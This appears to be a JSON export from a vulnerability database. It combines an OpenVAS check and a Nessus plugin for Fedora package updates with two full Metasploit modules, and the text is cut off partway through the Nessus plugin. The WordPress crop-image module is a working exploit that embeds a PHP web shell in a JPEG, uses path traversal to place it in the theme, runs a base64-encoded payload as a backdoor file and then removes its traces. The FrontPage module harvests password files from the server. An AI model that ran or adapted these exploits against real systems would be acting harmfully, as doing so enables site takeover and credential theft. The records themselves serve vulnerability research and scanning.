{"openvas": [{"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "OPENVAS:1361412562310875589", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875589", "title": "Fedora Update for java-1.8.0-openjdk FEDORA-2019-c701e6605a", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875589\");\n script_version(\"2019-05-03T11:15:46+0000\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 11:15:46 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-03 02:08:49 +0000 (Fri, 03 May 2019)\");\n script_name(\"Fedora Update for java-1.8.0-openjdk FEDORA-2019-c701e6605a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-c701e6605a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RMCBTSYT6MYQZU3IMTTE2WBDQV5JUVZO\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.8.0-openjdk'\n package(s) announced via the FEDORA-2019-c701e6605a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The OpenJDK runtime environment 8.\");\n\n script_tag(name:\"affected\", value:\"'java-1.8.0-openjdk' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"java\", rpm:\"java~1.8.0~openjdk~1.8.0.212.b04~0.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-11-23T00:27:49", "bulletinFamily": "exploit", "description": "This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. 
This exploit module only works for Unix-based systems currently.\n", "modified": "2019-04-04T20:19:58", "published": "2019-03-22T16:37:04", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_CROP_RCE", "href": "", "type": "metasploit", "title": "WordPress Crop-image Shell Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'WordPress Crop-image Shell Upload',\n 'Description' => %q{\n This module exploits a path traversal and a local file inclusion\n vulnerability on WordPress versions 5.0.0 and <= 4.9.8.\n The crop-image function allows a user, with at least author privileges,\n to resize an image and perform a path traversal by changing the _wp_attached_file\n reference during the upload. 
The second part of the exploit will include\n this image in the current theme by changing the _wp_page_template attribute\n when creating a post.\n\n This exploit module only works for Unix-based systems currently.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'RIPSTECH Technology', # Discovery\n 'Wilfried Becard <wilfried.becard@synacktiv.com>' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-8942' ],\n [ 'CVE', '2019-8943' ],\n [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']\n ],\n 'DisclosureDate' => 'Feb 19 2019',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['WordPress', {}]],\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),\n OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])\n ])\n end\n\n def check\n cookie = wordpress_login(username, password)\n if cookie.nil?\n store_valid_credential(user: username, private: password, proof: cookie)\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def get_wpnonce(cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie\n )\n if res && res.code == 200 && res.body && !res.body.empty?\n res.get_hidden_inputs.first[\"_wpnonce\"]\n end\n end\n\n def get_wpnonce2(image_id, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post' => image_id,\n 'action' => \"edit\"\n }\n )\n if res && res.code == 200 && res.body && !res.body.empty?\n tmp = res.get_hidden_inputs\n wpnonce2 = tmp[1].first[1]\n end\n end\n\n def get_current_theme\n uri = normalize_uri(datastore['TARGETURI'])\n res = 
send_request_cgi!(\n 'method' => 'GET',\n 'uri' => uri\n )\n fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?\n\n theme = res.body.scan(/\\/wp-content\\/themes\\/(\\w+)\\//).flatten.first\n fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme\n\n theme\n end\n\n def get_ajaxnonce(cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' => 'query-attachments',\n 'post_id' => '0',\n 'query[item]' => '43',\n 'query[orderby]' => 'date',\n 'query[order]' => 'DESC',\n 'query[posts_per_page]' => '40',\n 'query[paged]' => '1'\n }\n )\n fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty?\n a_nonce = res.body.scan(/\"edit\":\"(\\w+)\"/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce\n\n a_nonce\n end\n\n def upload_file(img_name, wp_nonce, cookie)\n img_data = %w[\n FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F\n 74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00\n 10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00\n 3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69\n 6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D\n 20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09\n 08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D\n 27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06\n 09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24\n 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24\n 24 24 
24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF\n C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06\n 07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01\n 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1\n 15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38\n 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73\n 74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4\n A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4\n D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF\n C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06\n 07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00\n 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09\n 23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37\n 38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A\n 73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2\n A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2\n D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF\n DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B\n 3F 3E\n ]\n img_data = [img_data.join].pack('H*')\n img_name += '.jpg'\n\n boundary = \"#{rand_text_alphanumeric(rand(10) + 5)}\"\n post_data = \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\"\n post_data << \"\\r\\n#{img_name}\\r\\n\"\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"action\\\"\\r\\n\"\n post_data << \"\\r\\nupload-attachment\\r\\n\"\n post_data << \"--#{boundary}\\r\\n\"\n post_data << 
\"Content-Disposition: form-data; name=\\\"_wpnonce\\\"\\r\\n\"\n post_data << \"\\r\\n#{wp_nonce}\\r\\n\"\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"async-upload\\\"; filename=\\\"#{img_name}\\\"\\r\\n\"\n post_data << \"Content-Type: image/jpeg\\r\\n\"\n post_data << \"\\r\\n#{img_data}\\r\\n\"\n post_data << \"--#{boundary}--\\r\\n\"\n print_status(\"Uploading payload\")\n upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => upload_uri,\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => post_data,\n 'cookie' => cookie\n )\n fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?\n print_good(\"Image uploaded\")\n res = JSON.parse(res.body)\n image_id = res[\"data\"][\"id\"]\n update_nonce = res[\"data\"][\"nonces\"][\"update\"]\n filename = res[\"data\"][\"filename\"]\n return filename, image_id, update_nonce\n end\n\n def image_editor(img_name, ajax_nonce, image_id, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' => 'image-editor',\n '_ajax_nonce' => ajax_nonce,\n 'postid' => image_id,\n 'history' => '[{\"c\":{\"x\":0,\"y\":0,\"w\":400,\"h\":300}}]',\n 'target' => 'all',\n 'context' => '',\n 'do' => 'save'\n }\n )\n fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty?\n filename = res.body.scan(/(#{img_name}-\\S+)-/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename\n\n filename << '.jpg'\n end\n\n def change_path(wpnonce2, image_id, filename, current_date, path, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n res = 
send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n '_wpnonce' => wpnonce2,\n 'action' => 'editpost',\n 'post_ID' => image_id,\n 'meta_input[_wp_attached_file]' => \"#{current_date}#{filename}#{path}\"\n }\n )\n end\n\n def crop_image(image_id, ajax_nonce, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' => 'crop-image',\n '_ajax_nonce' => ajax_nonce,\n 'id' => image_id,\n 'cropDetails[x1]' => 0,\n 'cropDetails[y1]' => 0,\n 'cropDetails[width]' => 400,\n 'cropDetails[height]' => 300,\n 'cropDetails[dst_width]' => 400,\n 'cropDetails[dst_height]' => 300\n }\n )\n end\n\n def include_theme(shell_name, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie\n )\n if res && res.code == 200 && res.body && !res.body.empty?\n wpnonce2 = res.body.scan(/name=\"_wpnonce\" value=\"(\\w+)\"/).flatten.first\n post_id = res.body.scan(/\"post\":{\"id\":(\\w+),/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id\n\n post_title = Rex::Text.rand_text_alpha(10)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n '_wpnonce'=> wpnonce2,\n 'action' => 'editpost',\n 'post_ID' => post_id,\n 'post_title' => post_title,\n 'post_name' => post_title,\n 'meta_input[_wp_page_template]' => \"cropped-#{shell_name}.jpg\"\n }\n )\n fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302\n post_id\n end\n end\n\n def check_for_base64(cookie, post_id)\n uri = normalize_uri(datastore['TARGETURI'])\n # Test if base64 is on target\n test_string = 
'YmFzZTY0c3BvdHRlZAo='\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_get' => {\n 'p' => post_id,\n '0' => \"echo #{test_string} | base64 -d\"\n }\n )\n fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty?\n\n fail_with(Failure::NotFound, \"Can't find base64 decode on target\") unless res.body.include?(\"base64spotted\")\n # Execute payload with base64 decode\n @backdoor = Rex::Text.rand_text_alpha(10)\n encoded = Rex::Text.encode_base64(payload.encoded)\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_get' => {\n 'p' => post_id,\n '0' => \"echo #{encoded} | base64 -d > #{@backdoor}.php\"\n }\n )\n\n fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'], \"#{@backdoor}.php\"),\n 'cookie' => cookie\n )\n end\n\n def wp_cleanup(shell_name, post_id, cookie)\n print_status('Attempting to clean up files...')\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => { 'action' => \"query-attachments\" }\n )\n\n fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?\n infos = res.body.scan(/id\":(\\d+),.*filename\":\"cropped-#{shell_name}\".*?\"delete\":\"(\\w+)\".*\"id\":(\\d+),.*filename\":\"cropped-x\".*?\"delete\":\"(\\w+)\".*\"id\":(\\d+),.*filename\":\"#{shell_name}\".*?\"delete\":\"(\\w+)\"/).flatten\n id1, id2, id3 = infos[0], infos[2], infos[4]\n delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]\n for i in (0...6).step(2)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' 
=> \"delete-post\",\n 'id' => infos[i],\n '_wpnonce' => infos[i+1]\n }\n )\n end\n\n uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri1,\n 'cookie' => cookie\n )\n\n if res && res.code == 200 && res.body && !res.body.empty?\n post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\\w+)/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce\n uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri2,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post' => post_id,\n 'action' => 'trash',\n '_wpnonce' => post_nonce\n }\n )\n\n fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri1,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post_status' => \"trash\",\n 'post_type' => 'post',\n '_wpnonce' => post_nonce\n }\n )\n\n if res && res.code == 200 && res.body && !res.body.empty?\n nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\\w+)/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri2,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post' => post_id,\n 'action' => 'delete',\n '_wpnonce' => nonce\n }\n )\n end\n end\n end\n\n def exploit\n fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?\n\n print_status(\"Authenticating with WordPress using #{username}:#{password}...\")\n cookie = wordpress_login(username, password)\n fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?\n print_good(\"Authenticated with WordPress\")\n store_valid_credential(user: username, private: password, proof: cookie)\n\n print_status(\"Preparing payload...\")\n @current_theme = get_current_theme\n wp_nonce = 
get_wpnonce(cookie)\n @current_date = Time.now.strftime(\"%Y/%m/\")\n\n img_name = Rex::Text.rand_text_alpha(10)\n @filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie)\n ajax_nonce = get_ajaxnonce(cookie)\n\n @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)\n wpnonce2 = get_wpnonce2(image_id, cookie)\n\n change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)\n crop_image(image_id, ajax_nonce, cookie)\n\n @shell_name = Rex::Text.rand_text_alpha(10)\n change_path(wpnonce2, image_id, @filename1, @current_date, \"?/../../../../themes/#{@current_theme}/#{@shell_name}\", cookie)\n crop_image(image_id, ajax_nonce, cookie)\n\n print_status(\"Including into theme\")\n post_id = include_theme(@shell_name, cookie)\n\n check_for_base64(cookie, post_id)\n wp_cleanup(@shell_name, post_id, cookie)\n end\n\n def on_new_session(client)\n client.shell_command_token(\"rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*\")\n client.shell_command_token(\"rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*\")\n client.shell_command_token(\"rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*\")\n client.shell_command_token(\"rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg\")\n client.shell_command_token(\"rm #{@backdoor}.php\")\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_crop_rce.rb"}, {"lastseen": "2019-12-09T09:09:16", "bulletinFamily": "exploit", "description": "This module downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage server to find credentials.\n", "modified": "2018-09-21T16:44:10", "published": "2018-08-27T18:20:26", "id": "MSF:AUXILIARY/SCANNER/HTTP/FRONTPAGE_CREDENTIAL_DUMP", "href": "", "type": "metasploit", "title": "FrontPage .pwd File 
Credential Dump", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'FrontPage .pwd File Credential Dump',\n 'Description' => %q{\n This module downloads and parses the '_vti_pvt/service.pwd',\n '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage\n server to find credentials.\n },\n 'References' =>\n [\n [ 'PACKETSTORM', '11556'],\n [ 'URL', 'https://insecure.org/sploits/Microsoft.frontpage.insecurities.html'],\n [ 'URL', 'http://sparty.secniche.org/' ]\n ],\n 'Author' =>\n [\n 'Aditya K Sood @adityaksood', # Sparty tool'\n 'Stephen Haywood @averagesecguy' # Metasploit module'\n ],\n 'License' => MSF_LICENSE,\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path', '/'])\n ])\n end\n\n\n def get_pass_file(fname)\n uri = normalize_uri(target_uri.path, '_vti_pvt', fname)\n\n vprint_status(\"Requesting: #{uri}\")\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n })\n\n unless res.code == 200\n vprint_status(\"File #{uri} not found.\")\n return nil\n end\n\n vprint_status(\"Found #{uri}.\")\n\n unless res.body.lines.first.chomp == '# -FrontPage-'\n vprint_status(\"File does not contain FrontPage credentials.\")\n vprint_status(res.body)\n return nil\n end\n\n vprint_status(\"Found FrontPage credentials.\")\n return res.body\n end\n\n def run_host(ip)\n files = ['service.pwd', 'administrators.pwd', 'authors.pwd']\n creds = []\n\n files.each do |filename|\n source = filename.chomp('.pwd').capitalize\n contents = get_pass_file(filename)\n\n next if contents.nil?\n\n print_good(\"#{ip} - #{filename}\")\n\n contents.each_line do |line|\n next if line.chomp == '# -FrontPage-'\n user = 
line.chomp.split(':')[0]\n pass = line.chomp.split(':')[1]\n\n creds << [source, user, pass]\n end\n end\n\n cred_table = Rex::Text::Table.new(\n 'Header' => 'FrontPage Credentials',\n 'Indent' => 1,\n 'Columns' => ['Source', 'Username', 'Password Hash']\n )\n\n creds.each do |c|\n cred_table << c\n end\n\n print_line\n print_line(\"#{cred_table}\")\n\n loot_name = 'frontpage.creds'\n loot_type = 'text/csv'\n loot_filename = 'frontpage_creds.csv'\n loot_desc = 'FrontPage Credentials'\n\n p = store_loot(\n loot_name,\n loot_type,\n rhost,\n cred_table.to_csv,\n loot_filename,\n loot_desc)\n\n print_status \"Credentials saved in: #{p}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/frontpage_credential_dump.rb"}], "nessus": [{"lastseen": "2019-11-01T02:32:11", "bulletinFamily": "scanner", "description": "The v4.16.11 kernel includes important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-DB0D3E157E.NASL", "href": "https://www.tenable.com/plugins/nessus/120842", "published": "2019-01-03T00:00:00", "title": "Fedora 28 : kernel (2018-db0d3e157e) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-db0d3e157e.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120842);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/23 11:21:09\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"FEDORA\", value:\"2018-db0d3e157e\");\n\n script_name(english:\"Fedora 28 : kernel (2018-db0d3e157e) 
(Spectre)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The v4.16.11 kernel includes important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-db0d3e157e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = 